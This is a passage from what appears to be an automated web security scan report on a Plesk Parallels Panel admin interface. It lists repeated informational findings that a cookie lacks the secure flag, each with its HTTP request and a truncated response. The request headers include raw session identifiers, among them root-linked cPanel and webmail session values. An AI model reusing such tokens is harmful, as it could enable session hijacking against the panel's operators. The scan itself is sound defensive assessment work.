The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer-service-plan/edit/id/5 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list?context=service-plans
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; BarExpanded=True

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 15:55:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:55:10 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=service-plans; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 15:55:12 GMT
Server: sw-cp-server
Content-Length: 160630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/list

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer-service-plan/list?context=service-plans HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; BarExpanded=True; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:12:54 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:12:54 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=service-plans; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:12:55 GMT
Server: sw-cp-server
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/list/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer-service-plan/list/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:16:00 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:16:00 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=service-plans; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:16:00 GMT
Server: sw-cp-server
Content-Length: 10515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/reset-search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/list/reset-search/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer-service-plan/list/reset-search/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:16:00 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:16:00 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=service-plans; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:16:00 GMT
Server: sw-cp-server
Content-Length: 10515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.7. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/create

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/create HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list?context=customers
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:57:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 18:57:58 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 18:57:58 GMT
Server: sw-cp-server
Content-Length: 46021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.8. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/list

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/list?context=customers HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:57:50 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 18:57:52 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 18:57:52 GMT
Server: sw-cp-server
Content-Length: 17559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.9. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/list/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/list/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:16:00 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:16:00 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:16:00 GMT
Server: sw-cp-server
Content-Length: 16547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.10. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/list/reset-search/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/list/reset-search/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:16:00 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:16:00 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:16:00 GMT
Server: sw-cp-server
Content-Length: 16316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.11. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/true/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/list/reset-search/true/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/list/reset-search/true/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 14:16:54 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:16:54 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:16:54 GMT
Server: sw-cp-server
Content-Length: 16316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.12. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/login-info/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/login-info/id/4

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/login-info/id/4 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4
Cookie: locale=en-US; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; psaContext=customers; BarExpanded=True

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 16:03:01 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 16:03:01 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 16:03:01 GMT
Server: sw-cp-server
Content-Length: 10366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.13. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/overview/id/4

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/overview/id/4 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list?context=customers
Cookie: locale=en-US; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; psaContext=customers; BarExpanded=True

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 16:02:47 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 16:02:47 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server
Content-Length: 21835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.14. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/personal-info/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/personal-info/id/4

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/personal-info/id/4 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4
Cookie: locale=en-US; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; psaContext=customers; BarExpanded=True

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 16:02:52 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 16:02:52 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 16:02:52 GMT
Server: sw-cp-server
Content-Length: 28591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.15. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/domain/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/domain/list

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/domain/list?context=domains HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:11:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:11:07 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=domains; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:11:07 GMT
Server: sw-cp-server
Content-Length: 10295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.16. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/health/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/health/?group=Services HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:00:01 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:00:02 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
